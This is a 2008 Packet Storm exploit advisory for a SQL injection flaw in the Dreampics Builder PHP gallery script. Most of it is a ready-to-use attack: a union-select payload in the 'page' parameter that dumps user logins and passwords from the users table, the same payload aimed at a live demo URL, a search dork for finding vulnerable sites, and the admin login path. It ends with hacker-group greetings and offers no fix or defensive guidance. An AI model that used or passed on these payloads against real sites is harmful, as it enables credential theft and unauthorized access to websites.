dreampics-sql.txt

2008-07-10T00:00:00
ID PACKETSTORM:68056
Type packetstorm
Reporter Hussin X
Modified 2008-07-10T00:00:00

Description

                                        
                                            `#########################################################  
#  
# PICS BUILDER (page) SQL Injection Vulnerability  
#========================================================  
# Author: Hussin X =  
# =  
# Home : www.tryag.cc/cc =  
# =  
# email: darkangel_g85[at]Yahoo[DoT]com =  
# =  
#=========================================================   
#  
# script : http://www.dreamlevels.com/dreampics.php  
#  
# DorK : powered by Dreampics Builder  
#   
##########################################################  
  
Exploit:   
  
www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--  
  
  
L!VE DEMO:  
  
http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--  
  
  
Admin Login :  
  
/admin/  
  
########################( Greetz )###########################  
# #  
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #  
# #   
# Iraqihack / FAHD / mos_chori / Silic0n #  
# #  
#############################################################  
  
Im IRAQi  
  
`